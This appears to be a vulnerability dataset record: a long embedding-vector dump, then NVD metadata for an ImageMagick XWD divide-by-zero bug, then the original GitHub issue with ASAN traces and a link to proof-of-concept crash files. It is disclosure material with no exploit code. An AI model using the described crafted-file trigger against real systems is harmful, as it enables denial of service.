0.011416850611567497, 0.021001575514674187, 0.005063788499683142, 0.02692205272614956, 0.010772214271128178, -0.006548149045556784, 0.015954751521348953, -0.011645865626633167, -0.01514047384262085, -0.01883016899228096, -0.00034431854146532714, 0.004906870424747467, -0.007782288361340761, 0.017354290932416916, 0.004868701566010714, 0.00775684230029583, 0.005984092131257057, 0.002614594530314207, -0.017778394743800163, -0.019254272803664207, -0.016022607684135437, 0.00849902257323265, 0.007582960184663534, -0.00030270343995653093, -0.0057423533871769905, 0.0025488585233688354, 0.0018554502166807652, -0.012315948493778706, 0.0031107948161661625, -0.0063148923218250275, 0.002396181458607316, -0.026311343535780907, 0.006522702518850565, -0.016166802495718002, 0.02948363497853279, 0.009075801819562912, 0.013969949446618557, -0.008079160004854202, -0.0031065538059920073, -0.016582423821091652, 0.017244024202227592, -0.01136595755815506, -0.022375669330358505, 0.003134120488539338, 0.01833820901811123, 0.012909692712128162, 0.00003266917701694183, 0.004932316951453686, -0.01928820088505745, -0.005369142629206181, 0.02899167500436306, -0.005801727995276451, -0.002947515109553933, 0.010263290256261826, -0.004285559989511967, 0.012036040425300598, 0.004056544508785009, -0.02402118779718876, -0.014215929433703423, -0.012494071386754513, 0.005789004731923342, 0.01283335406333208, 0.006141010206192732, 0.01883016899228096, 0.022053351625800133, 0.0063148923218250275, 0.0032019768841564655, 0.015522166155278683, -0.004465803503990173, -0.0066160052083432674, -0.010246326215565205, -0.010873998515307903, 0.008270006626844406, 0.0016168922884389758, 0.015106545761227608, -0.018609635531902313, -0.005377624649554491, 0.0006388049805536866, -0.02746490389108658, -0.014733335003256798, 0.0022010940592736006, 0.013528882525861263, -0.0017663886537775397, -0.002049477305263281, -0.01238380465656519, -0.007269124034792185, 0.006624487228691578, 0.006590559147298336, 0.01816856861114502, 0.019678374752402306, 0.0010634380159899592, -0.019797123968601227, -0.022782808169722557, -0.005398829933255911, -0.0002963418955914676, -0.007964652962982655, -0.013011476956307888, -0.016785992309451103, 0.0007713371887803078, 0.011348993517458439, -0.012901210226118565, -0.0028287663590162992, -0.022222992032766342, -0.0011567407054826617, 0.007875590585172176, 0.02193460240960121, -0.007213990669697523, 0.0018533297115936875, -0.0063827489502727985, -0.004291921388357878, 0.012867282144725323, 0.02592116966843605, -0.0035857900511473417, 0.017574824392795563, -0.03599785640835762, 0.019169451668858528, 0.01320656482130289, -0.00250432756729424, 0.007934965193271637, 0.03820319101214409, -0.006509979721158743, -0.012587374076247215, 0.007803493645042181, -0.021544428542256355, -0.009678028523921967, -0.007023144047707319, -0.013936021365225315, -0.01733732596039772, -0.013028440997004509, 0.007358185481280088, -0.0070570725947618484, -0.012197199277579784, -0.01894891820847988, 0.0327577069401741, -0.01412262674421072, 0.019220344722270966, -0.0065863183699548244, 0.03861032798886299, -0.00800706259906292, 0.02878810465335846, -0.004168931394815445, -0.00708251865580678, -0.013978431932628155, -0.000534634746145457, 0.016853850334882736, 0.009389637969434261, -0.00012941764725837857, -0.012960584834218025, 0.022375669330358505, -0.030552374199032784, 0.006018020212650299, 0.001830004039220512, 0.008270006626844406, 0.0018416668754070997, 0.019101595506072044, 0.005882307421416044, 0.0044318754225969315, -0.006832297891378403, 0.01138292159885168, 0.01080614235252142, 0.008435406722128391, -0.018151603639125824, -0.012757015414536, 0.004086231347173452, 0.00667962059378624, -0.031875573098659515, -0.023800654336810112, 0.009754367172718048, 0.0042325472459197044, -0.0020728029776364565, -0.010339628905057907, -0.00012471276568248868, -0.025072963908314705, -0.019848017022013664, -0.004682096187025309, 0.013325313106179237, 0.00800706259906292, -0.007731396239250898, 0.02641312964260578, 0.01791410706937313, -0.0049704862758517265, -0.007782288361340761, -0.0036939363926649094, -0.015547612681984901, 0.0029241894371807575, 0.008914642967283726, -0.009991864673793316, -0.0027693919837474823, -0.025785457342863083, -0.014461909420788288, -0.007922242395579815, 0.0007575538475066423, 0.005343696568161249, -0.016692690551280975, -0.006179179530590773, -0.009991864673793316, -0.009245443157851696, 0.00935570988804102, -0.0011832470772787929, -0.009169104509055614, 0.0024576764553785324, -0.015284668654203415, -0.010237844660878181, -0.029958629980683327, 0.008197909221053123, 0.004109557252377272, 0.0065820771269500256, -0.038508545607328415, 0.010212398134171963, -0.02637920156121254, 0.021832818165421486, 0.014580657705664635, 0.008889197371900082, 0.004652408882975578, 0.027057765051722527, 0.015564576722681522, 0.007230954710394144, -0.010924890637397766, -0.016523050144314766, 0.011942737735807896, 0.005958646070212126, -0.006976492702960968, -0.0134779904037714, 0.029873808845877647, 0.0018999810563400388, 0.01580207422375679, 0.0065990411676466465, 0.0074557289481163025, -0.020560508593916893, 0.004406429361552, 0.0019752592779695988, 0.0037109004333615303, 0.0060434662736952305, -0.010661947540938854, -0.013002995401620865, 0.023240840062499046, -0.004643926862627268, 0.005975610110908747, 0.00040236764471046627, 0.003636682406067848, -0.016930188983678818, 0.0047033014707267284, 0.00048506769235245883, -0.003407666925340891, 0.014953868463635445, 0.0015373730566352606, 0.006662656553089619, -0.011764614842832088, 0.013248974457383156, 0.009584725834429264, 0.0018787758890539408, 0.009270889684557915, -0.001283971592783928, 0.00972892064601183, -0.019016774371266365, -0.008180945180356503, -0.0010035334853455424, -0.0040353392250835896, -0.0068535031750798225, -0.012477107346057892, -0.007129170000553131, -0.001331683131866157, -0.0028224049601703882, 0.017642680555582047, -0.008346345275640488, -0.0015500960871577263, 0.012078450992703438, -0.019423913210630417, 0.019016774371266365, 0.011170870624482632, -0.02816043235361576, -0.014461909420788288, -0.023919403553009033, 0.0022222993429750204, 0.01759178936481476, -0.007905278354883194, -0.01767660863697529, -0.014648514799773693, -0.011018193326890469, -0.004915352910757065, -0.005916235502809286, -0.00937267392873764, -0.014936904422938824, -0.0015331320464611053, -0.011747650802135468, 0.004219823982566595, -0.003630321007221937, 0.004440357442945242, -0.013944503851234913, 0.014521284028887749, 0.02451314777135849, -0.013766380026936531, 0.012061486952006817, 0.01782928593456745, -0.015327079221606255, 0.005364901851862669, 0.0009409783524461091, -0.010873998515307903, 0.01033114641904831, 0.0029135870281606913, 0.002406784100458026, -0.018066784366965294, -0.004266475327312946, -0.0023410480935126543, 0.012265056371688843, -0.003278315532952547, 0.008528709411621094, 0.004427634179592133, 0.0012542844051495194, -0.021747997030615807, -0.000011911327419511508, 0.00021006347378715873, -0.010365075431764126, -0.033826448023319244, 0.03423358500003815, -0.002304999390617013, 0.0003846083127427846, 0.004749952349811792, -0.004847496282309294, -0.026854196563363075, -0.004219823982566595, -0.0035539823584258556, -0.012790943495929241, 0.006255517713725567, -0.020255153998732567, 0.01011909544467926, -0.013673077337443829, 0.004283439368009567, -0.003558223368600011, 0.0027566689532250166, -0.016277069225907326, -0.028889890760183334, 0.02164621278643608, 0.00852022785693407, -0.011866399087011814, -0.00018687034025788307, -0.004749952349811792, -0.017260989174246788, -0.004983209073543549, -0.026854196563363075, -0.019932836294174194, -0.014249857515096664, -0.0038911441806703806, 0.01178157888352871, -0.001920125912874937, 0.009567761793732643, -0.0050849937833845615, -0.008231837302446365, 0.00403321860358119, 0.011688276194036007, -0.010890962556004524, 0.01011909544467926, 0.009508387185633183, -0.01408021617680788, 0.005738112144172192, -0.0009081103489734232, 0.014326196163892746, -0.0032231821678578854, -0.006989215966314077, -0.0005842017708346248, -0.007489657495170832, -0.019169451668858528, 0.000904399435967207, -0.006887431256473064, 0.0015320717357099056, 0.0024322301615029573, 0.015276187099516392, -0.026022953912615776, 0.0056575327180325985, 0.003310123225674033, 0.01754089631140232, -0.017320362851023674, 0.009525351226329803, 0.010424449108541012, 0.007014662027359009, -0.011671312153339386, -0.007973134517669678, -0.0036557670682668686, 0.008846786804497242, 0.02592116966843605, -0.019016774371266365, 0.002849971642717719, -0.0005587555933743715, -0.0014027203433215618, 0.008549914695322514, 0.004111677873879671, 0.018881062045693398, -0.02193460240960121, -0.012621302157640457, 0.00048321226495318115, -0.008248801343142986, 0.014283785596489906, 0.023834584280848503, -0.02103550359606743, -0.04424241557717323, 0.009169104509055614, 0.02322387509047985, -0.009330264292657375, 0.01816856861114502, -0.0041498467326164246, -0.007502380292862654, -0.011272654868662357, -0.0006335037178359926, 0.015869930386543274, -0.011086050420999527, -0.019339092075824738, -0.0053903479129076, 0.008719556033611298, -0.007663539610803127, 0.004537900909781456, -0.01676054671406746, 0.0012341394321992993, 0.009779812768101692, 0.011578009463846684, -0.007023144047707319, -0.014640032313764095, -0.008562637493014336, 0.006938323378562927, 0.0038911441806703806, -0.01788017898797989, -0.006522702518850565, -0.014860565774142742, 0.012086932547390461, 0.02476760931313038, 0.011170870624482632, 0.007973134517669678, -0.00670930789783597, 0.00941508449614048, -0.016404300928115845, -0.010500787757337093, 0.016769029200077057, 0.007506621535867453, 0.027261335402727127, -0.013138707727193832, -0.010687393136322498, 0.014546729624271393, 0.011594973504543304, -0.010382039472460747, -0.01254496444016695, 0.0046015167608857155, -0.007201267406344414, 0.008787412196397781, -0.0048856656067073345, -0.010687393136322498, -0.020170334726572037, 0.029704168438911438, 0.01072132121771574, -0.0034861259628087282, 0.013919057324528694, 0.013257456943392754, 0.007006180007010698, 0.01184095349162817, 0.01179854292422533, 0.013783344067633152, 0.005216465797275305, -0.0035645850002765656, -0.01808374747633934, -0.017439112067222595, 0.013986913487315178, 0.018066784366965294, -0.007201267406344414, 0.008829822763800621, -0.02588724158704281, -0.0196953397244215, -0.01650608517229557, 0.0018363655544817448, 0.016573941335082054, -0.012824871577322483, -0.020628364756703377, 0.0018586310325190425, -0.009118212386965752, 0.010619536973536015, -0.011849435046315193, 0.007663539610803127, -0.016107428818941116, 0.0020091875921934843, 0.006488774437457323, -0.005971368867903948, 0.012298984453082085, 0.0315193273127079, -0.007515103556215763, 0.0034097873140126467, 0.004249511286616325, -0.011934256181120872, -0.0014048408484086394, -0.013656113296747208, -0.016073500737547874, 0.019932836294174194, 0.0356585718691349, 0.01908463053405285, 0.002497966168448329, -0.0340130515396595, -0.010933373123407364, -0.00600529694929719, -0.015734218060970306, 0.0007739877910353243, 0.00866866298019886, 0.019101595506072044, -0.00600529694929719, 0.026073846966028214, 0.0013422856573015451, -0.01733732596039772, 0.01449583750218153, -0.004512454848736525, 0.002064320957288146, 0.01383423712104559, -0.009287853725254536, 0.009627136401832104, 0.01974623091518879, -0.008923125453293324, 0.008719556033611298, 0.025530995801091194, -0.023783691227436066, 0.011951220221817493, -0.01675206422805786, -0.00013942383520770818, 0.01983105204999447, -0.013028440997004509, 0.0038423724472522736, 0.00908428430557251, -0.008138534612953663, -0.016268586739897728, 0.007197026163339615, -0.01238380465656519, 0.010042756795883179, -0.00937267392873764, -0.007451488170772791, -0.015852967277169228, 0.011518634855747223, -0.019101595506072044, 0.009194551035761833, 0.007748360279947519, -0.024852430447936058, 0.0007146134157665074, 0.007027385290712118, 0.02500510774552822, -0.002379217417910695, -0.007498139515519142, 0.022630130872130394, 0.012095415033400059, 0.014673960395157337, -0.009245443157851696, 0.01845695823431015, -0.02948363497853279, 0.00937267392873764, 0.015013243071734905, -0.010153023526072502, 0.0027778740040957928, 0.019966764375567436, 0.004306764807552099, 0.00505954772233963, -0.011204798705875874, -0.012909692712128162, -0.0014080216642469168, -0.03596392646431923, 0.000004220320988679305, 0.014131109230220318, -0.015208330005407333, 0.005233429837971926, -0.007375149521976709, -0.01105212140828371, -0.00972892064601183, -0.02057747356593609, 0.006374266929924488, -0.0011217521969228983, -0.0039505185559391975, -0.00150874606333673, 0.0013719729613512754, 0.0014249858213588595, -0.008329381234943867, -0.012180235236883163, 0.023325659334659576, -0.01476726308465004, 0.012231128290295601, 0.004289800766855478, 0.0004802965559065342, -0.0017589668277651072, -0.020170334726572037, 0.010305700823664665, 0.0100597208365798, -0.006539667025208473, -0.0019529939163476229, -0.015361007302999496, -0.010271772742271423, 0.005314009264111519, -0.029093459248542786, 0.010441413149237633, 0.009287853725254536, -0.004754193592816591, -0.0284148957580328, -0.0024916045367717743, -0.0030535408295691013, 0.022087279707193375, -0.010280254296958447, -0.012740051373839378, -0.018032856285572052, 0.01862660050392151, 0.012536481954157352, -0.0005476228543557227, 0.03596392646431923, -0.015819039195775986, 0.014597621746361256, 0.013028440997004509, -0.010322664864361286, 0.023783691227436066, 0.021680140867829323, 0.005428517237305641, -0.010882481001317501, 0.000017643344108364545, 0.023291731253266335, 0.0019137643976137042, 0.01542886346578598, 0.017761429771780968, 0.01721857860684395, -0.02285066433250904, 0.010636501014232635, -0.0034352336078882217, 0.0038211671635508537, -0.018779275938868523, 0.022087279707193375, -0.030840763822197914, 0.01486904826015234, 0.004427634179592133, 0.013825754635035992, 0.023529229685664177, 0.009644100442528725, 0.006280964240431786, 0.017812322825193405, -0.002792717656120658, 0.019101595506072044, 0.01525922305881977, 0.0023601327557116747, -0.024547075852751732, -0.02273191511631012, 0.008872232399880886, -0.006141010206192732, -0.015318596735596657, -0.003411907935515046, 0.004898388404399157, 0.003696056781336665, 0.003997169900685549, -0.03185861185193062, 0.02123907394707203, 0.026599735021591187, -0.0027905970346182585, -0.012434697709977627, -0.017523931339383125, -0.002707896986976266, 0.020000692456960678, -0.0015606987290084362, -0.011628901585936546, 0.008990981616079807, -0.012256573885679245, -0.015954751521348953, 0.015386453829705715, -0.0027460663113743067, -0.003988687880337238, -0.0006573594873771071, -0.009550797753036022, -0.008596565574407578, -0.02870328538119793, -0.0016243141144514084, 0.02140871435403824, 0.004436116199940443, 0.005377624649554491, 0.006289446260780096, 0.016192249953746796, -0.0049704862758517265, 0.020509617403149605, -0.01630251668393612, 0.000551333767361939, -0.008974017575383186, 0.014266821555793285, -0.01609046384692192, 0.0250899288803339, -0.002947515109553933, -0.002209576079621911, -0.0033991849049925804, -0.00287753832526505, 0.036846060305833817, -0.003664249088615179, -0.003918711096048355, -0.00369181577116251, -0.0021735273767262697, -0.010543198324739933, -0.0016200731042772532, -0.0050722709856927395, 0.006119804922491312, 0.009966418147087097, 0.015191365964710712, 0.011917292140424252, -0.0024788815062493086, 0.009813740849494934, -0.00011941147386096418, -0.016319479793310165, 0.017761429771780968, -0.013707006350159645, 0.0018225822132080793, -0.007146134041249752, -0.00003159235347993672, -0.024648860096931458, -0.0017950155306607485, 0.008643217384815216, 0.018931953236460686, -0.009169104509055614, 0.008062195964157581, -0.003965361975133419, -0.0009876296389847994, -0.01745607517659664, -0.0373210571706295, 0.013121743686497211, 0.002096128650009632, 0.00983070582151413, 0.011722204275429249, 0.005729630123823881, -0.027397047728300095, -0.02144264243543148, -0.02620955929160118, 0.0022753120865672827, 0.010008828714489937, -0.007591442205011845, 0.017362773418426514, 0.025514030829072, 0.009711956605315208, 0.006671138573437929, -0.014716370962560177, 0.011340511962771416, -0.0011938497191295028, 0.004669372923672199, -0.013469507917761803, -0.02273191511631012, 0.005292804446071386, -0.013715487904846668, 0.02505599893629551, 0.01478422712534666, -0.0010178469819948077, 0.006963769905269146, -0.0035242950543761253, 0.0002478351234458387, 0.023325659334659576, 0.013452543877065182, 0.01119631715118885, 0.010271772742271423, 0.018321245908737183, -0.0024788815062493086, 0.0015628192340955138, -0.006353061646223068, -0.0035391387064009905, -0.0008699410827830434, 0.016268586739897728, -0.027363119646906853, 0.02359708584845066, 0.023580120876431465, -0.0073412214405834675, 0.01642974652349949, 0.008660181425511837, 0.003573067020624876, -0.010153023526072502, -0.003280435921624303, 0.027346154674887657, 0.0030726254917681217, 0.01978015899658203, -0.007960411719977856, -0.012358359061181545, 0.009652581997215748, 0.01862660050392151, 0.016896259039640427, -0.005716907326132059, 0.010644982568919659, -0.007421800866723061, 0.009644100442528725, -0.006726271938532591, 0.024530112743377686, -0.010356592945754528, -0.0012966946233063936, -0.0010517751798033714, 0.005975610110908747, 0.014707888476550579, 0.029958629980683327, 0.008096124976873398, -0.009822223335504532, 0.0003938855661544949, -0.010890962556004524, 0.004694818984717131, -0.015437345951795578, 0.02683723159134388, 0.009652581997215748, -0.010636501014232635, -0.0078119756653904915, -0.004660890903323889, 0.006539667025208473, 0.0013974191388115287, -0.010203915648162365, -0.006980733945965767, 0.014071734622120857, -0.005721148103475571, -0.004109557252377272, -0.004503972828388214, -0.00879589468240738, -0.011773096397519112, 0.003503090003505349, -0.002406784100458026, 0.005975610110908747, -0.005869584158062935, -0.01113694254308939, -0.010034275241196156, -0.013350759632885456, -0.0017928950255736709, 0.0008699410827830434, 0.0022010940592736006, -0.014877529814839363, -0.01750696823000908, 0.005161332432180643, -0.022121207788586617, 0.002175647998228669, -0.0036027540918439627, -0.01086551696062088, 0.014970832504332066, -0.031909503042697906, -0.006560871843248606, -0.00505954772233963, -0.0087110735476017, -0.011281137354671955, -0.003829649183899164, 0.01175613235682249, -0.016531530767679214, -0.0014610345242545009, -0.0007665660232305527, -0.010136059485375881, 0.0015055653639137745, -0.016277069225907326, 0.01600564457476139, -0.002209576079621911, 0.0035773080307990313, -0.0209506843239069, 0.00914365891367197, 0.03160414844751358, -0.008070678450167179, 0.00951686967164278, 0.024275651201605797, 0.005152850411832333, 0.0024195071309804916, 0.01055168081074953, -0.014258340001106262, 0.0012913933023810387, 0.002606112277135253, -0.01782928593456745, 0.01683688536286354, 0.0013550088042393327, -0.0033631359692662954, 0.013452543877065182, -0.002279553096741438, -0.004576070234179497, 0.0015235897153615952, 0.0025424968916922808, -0.0070867594331502914, 0.007281846832484007, 0.0016296154353767633, 0.030433624982833862, -0.017328845337033272, -0.00043258495861664414, 0.004457321483641863, 0.013622185215353966, -0.010186951607465744, -0.018423030152916908, 0.0201194416731596, -0.009940972551703453, 0.009067320264875889, -0.000983918784186244, -0.016641797497868538, -0.03620142489671707, 0.006348820403218269, 0.00640819501131773, 0.0050001731142401695, -0.0027524279430508614, 0.002283794106915593, 0.010543198324739933, -0.009211515076458454, 0.009364192374050617, 0.011942737735807896, 0.01341861579567194, 0.01788017898797989, -0.0037109004333615303, 0.006755959242582321, -0.01676054671406746, -0.00538186589255929, 0.019797123968601227, -0.008804376237094402, -0.0005953344516456127, 0.0018798360833898187, 0.00399292865768075, -0.02397029660642147, -0.0121293431147933, -0.017812322825193405, 0.006263999734073877, -0.034403227269649506, -0.0004058134800288826, 0.006675379816442728, 0.017184650525450706, 0.011671312153339386, 0.005695702042430639, 0.0009436289547011256, 0.00804947316646576, -0.006921359337866306, 0.010729803703725338, 0.0042325472459197044, -0.0022074556909501553, -0.00813005305826664, -0.031332723796367645, -0.0021618646569550037, -0.0004214522778056562, -0.0026082328986376524, 0.06809396296739578, 0.002852092031389475, 0.002423748141154647, 0.008880714885890484, -0.0014536126982420683, -0.000567237613722682, 0.014029324054718018, -0.014377088285982609, -0.006179179530590773, 0.006857743952423334, -0.021205145865678787, -0.0029814434237778187, 0.017031973227858543, -0.018117675557732582, -0.00872803758829832, 0.00843964796513319, 0.006861985195428133, 0.0036282003857195377, -0.020221225917339325, 0.000577310100197792, -0.007680503651499748, -0.002434350783005357, 0.013240492902696133, 0.0019116438925266266, -0.014266821555793285, 0.014419498853385448, 0.00914365891367197, -0.0001518818608019501, 0.021849781274795532, -0.038338903337717056, 0.011925773695111275, 0.011391404084861279, 0.007672021631151438, -0.002053718315437436, 0.012086932547390461, 0.02086586318910122, -0.008040990680456161, 0.02542920969426632, -0.005598158575594425, -0.03324966877698898, 0.01629403419792652, 0.0020685619674623013, -0.0007522525265812874, -0.0035221746657043695, 0.0018130398821085691, 0.0018543900223448873, -0.005967128090560436, -0.011908809654414654, 0.0014620947185903788, -0.0008752424037083983, -0.014232893474400043, 0.009924008511006832, 0.0028542126528918743, 0.0038063235115259886, 0.0001168933667941019, -0.01621769554913044, -0.0034373539965599775, -0.0072394367307424545, -0.004588793497532606, -0.011128460057079792, -0.012740051373839378, -0.008855268359184265, -0.00877044815570116, 0.011611937545239925, -0.0052885632030665874, 0.024089045822620392, 0.018100712448358536, 0.017116792500019073, -0.012765497900545597, 0.0046015167608857155, 0.014020842500030994, -0.007646575570106506, -0.018728384748101234, 0.004440357442945242, -0.012824871577322483, -0.018219461664557457, 0.010305700823664665, -0.004487008787691593, -0.0052885632030665874, 0.011518634855747223, -0.007977375760674477, -0.011374440044164658, -0.01001731026917696, -0.009186068549752235, -0.010382039472460747, -0.01439405232667923, -0.006747477222234011, -0.0032443872187286615, -0.005903512705117464, 0.016972597688436508, 0.015937786549329758, 0.016641797497868538, -0.007175821345299482, -0.007960411719977856, -0.0014249858213588595, -0.0061282869428396225, 0.0012383804423734546, -0.0012012715451419353, 0.007421800866723061, 0.002434350783005357, -0.0035009696148335934, 0.007867109030485153, -0.011255690827965736, 0.004427634179592133, -0.004822050221264362, -0.014835120178759098, -0.023647978901863098, -0.0203230120241642, -0.005967128090560436, -0.0014737575547769666, -0.006433641072362661, 0.009669546037912369, -0.01383423712104559, 0.010585608892142773, -0.0003713550977408886, -0.0012468625791370869, 0.007294570095837116, 0.005157091189175844, 0.0036027540918439627, 0.015064135193824768, -0.0005932139465585351, -0.006221589632332325, 0.019966764375567436, 0.006802610587328672, -0.004533660132437944, -0.011671312153339386, 0.010466859675943851, 0.01857570745050907, 0.0026782099157571793, 0.013919057324528694, -0.004041700623929501, -0.02061140164732933, 0.015394935384392738, 0.028211325407028198, 0.02683723159134388, 0.0242586862295866, 0.0077950116246938705, 0.013986913487315178, 0.02152746357023716, 0.000185942612006329, -0.03229967877268791, 0.05961190536618233, -0.004690578207373619, 0.009423566982150078, -0.008515986613929272, 0.011857917532324791, -0.015657879412174225, -0.003320725867524743, -0.014979314990341663, -0.01007668487727642, 0.02252834662795067, 0.009508387185633183, 0.019423913210630417, -0.011315065436065197, -0.007913759909570217, 0.015564576722681522, 0.015318596735596657, 0.01445342693477869, 0.00866866298019886, 0.01613287441432476, -0.010746767744421959, -0.01412262674421072, -0.005899271462112665, 0.010203915648162365, 0.012519517913460732, 0.011951220221817493, 0.005738112144172192, 0.0017144359881058335, 0.008821340277791023, 0.005475168582051992, -0.016938669607043266, 0.002497966168448329, 0.006331856362521648, -0.015377971343696117, 0.02732919156551361, 0.0051740556955337524, 0.007188544142991304, 0.0023580121342092752, 0.009771331213414669, -0.004690578207373619, 0.005343696568161249, -0.0013995396438986063, -0.022545309737324715, -0.0054709273390471935, -0.014987796545028687, 0.014139590784907341, -0.017523931339383125, -0.01571725308895111, 0.012434697709977627, 0.0015310115413740277, 0.003660008078441024, -0.010288736782968044, 0.007934965193271637, -0.009007945656776428, -0.008745001628994942, 0.023240840062499046, -0.004593034274876118, -0.008579601533710957, 0.011391404084861279, -0.023206911981105804, 0.0034776439424604177, -0.016480639576911926, 0.005343696568161249, 0.025768492370843887 ]
1,812
CVE-2019-11472
2019-04-23T14:29:00.837000
ReadXWDImage in coders/xwd.c in the XWD image parsing component of ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (divide-by-zero error) by crafting an XWD image file in which the header indicates neither LSB first nor MSB first.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00057.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00001.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1546" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/f663dfb8431c97d95682a2b533cca1c8233d21b4" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PF62B5PJA2JDUOCKJGUQO3SPL74BEYSV/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WHIKB4TP6KBJWT2UIPWL5MWMG5QXKGEJ/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://usn.ubuntu.com/4034-1/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-41:q16:*:*:*:*:*:*", "matchCriteriaId": "34C2A939-19C7-4BC0-8DE5-E3D612C99B0E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1546
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description When using `identify -verbose $FILE` on XWD files, it may emit FPE errors at multiple locations. ### Steps to Reproduce * run `identify -verbose $FILE` * ASAN messages may be like: fpe_xwd.c:490_1.xwd ``` ASAN:DEADLYSIGNAL ================================================================= ==19029==ERROR: AddressSanitizer: FPE on unknown address 0x7f0623a03210 (pc 0x7f0623a03210 bp 0x000000000000 sp 0x7ffc86dbd220 T0) #0 0x7f0623a0320f (/usr/lib/x86_64-linux-gnu/libX11.so.6+0x2720f) #1 0x7f0627deb295 in ReadXWDImage coders/xwd.c:490 #2 0x7f06276d4854 in ReadImage MagickCore/constitute.c:547 #3 0x7f06276d778b in ReadImages MagickCore/constitute.c:917 #4 0x7f0626f69817 in IdentifyImageCommand MagickWand/identify.c:321 #5 0x7f0626ffdde0 in MagickCommandGenesis MagickWand/mogrify.c:184 #6 0x55c1ef27bf00 in MagickMain utilities/magick.c:149 #7 0x55c1ef27c186 in main utilities/magick.c:180 #8 0x7f062675ab96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #9 0x55c1ef27b979 in _start (/home/hongxu/work/imagemagick/ImageMagick-asan/install/bin/magick+0x1979) ``` fpe_xwd.c:520_1.xwd ``` ASAN:DEADLYSIGNAL ================================================================= ==28450==ERROR: AddressSanitizer: FPE on unknown address 0x7f20a562e210 (pc 0x7f20a562e210 bp 0x000000000000 sp 0x7ffd19f36b80 T0) #0 0x7f20a562e20f (/usr/lib/x86_64-linux-gnu/libX11.so.6+0x2720f) #1 0x7f20a9a166c9 in ReadXWDImage coders/xwd.c:520 #2 0x7f20a92ff854 in ReadImage MagickCore/constitute.c:547 #3 0x7f20a930278b in ReadImages MagickCore/constitute.c:917 #4 0x7f20a8b94817 in IdentifyImageCommand MagickWand/identify.c:321 #5 0x7f20a8c28de0 in MagickCommandGenesis MagickWand/mogrify.c:184 #6 0x55b4ed9adf00 in MagickMain utilities/magick.c:149 #7 0x55b4ed9ae186 in main utilities/magick.c:180 #8 0x7f20a8385b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #9 0x55b4ed9ad979 in _start (/home/hongxu/work/imagemagick/ImageMagick-asan/install/bin/magick+0x1979) ``` ### System Configuration - ImageMagick version:7.0.8-41 Q16 x86_64 2019-04-14 - Environment (Operating system, version and so on): Ubuntu 18.04 LTS, x84_64 - Additional information: This was firstly detected in GraphicsMagick, but I found this also happens in ImageMagick 6/7. POCs: [im.zip](https://github.com/ImageMagick/ImageMagick/files/3077110/im.zip)
FPE errors when reading XWD images
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1546/comments
2
2019-04-14T07:21:12
2019-04-24T01:24:42Z
https://github.com/ImageMagick/ImageMagick/issues/1546
432,941,385
1,546
true
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : FPE errors when reading XWD images Issue date: --- start body --- ### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description When using `identify -verbose $FILE` on XWD files, it may emit FPE errors at multiple locations. ### Steps to Reproduce * run `identify -verbose $FILE` * ASAN messages may be like: fpe_xwd.c:490_1.xwd ``` ASAN:DEADLYSIGNAL ================================================================= ==19029==ERROR: AddressSanitizer: FPE on unknown address 0x7f0623a03210 (pc 0x7f0623a03210 bp 0x000000000000 sp 0x7ffc86dbd220 T0) #0 0x7f0623a0320f (/usr/lib/x86_64-linux-gnu/libX11.so.6+0x2720f) #1 0x7f0627deb295 in ReadXWDImage coders/xwd.c:490 #2 